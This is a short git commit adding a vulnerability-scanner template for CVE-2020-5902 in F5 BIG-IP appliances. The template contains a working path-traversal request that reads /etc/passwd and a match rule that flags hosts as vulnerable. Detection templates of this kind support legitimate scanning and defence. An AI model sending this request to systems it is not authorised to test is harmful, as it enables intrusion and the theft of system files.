* v8.6 - Added CVE-2020-5902 F5 BIG-IP RCE sc0pe template

This commit is contained in:
@xer0dayz 2020-07-05 10:26:40 -07:00 committed by xer0dayz
parent 7da27545a1
commit 527fb601e3
1 changed files with 9 additions and 0 deletions

View File

@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
METHOD='GET'
MATCH="root\:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'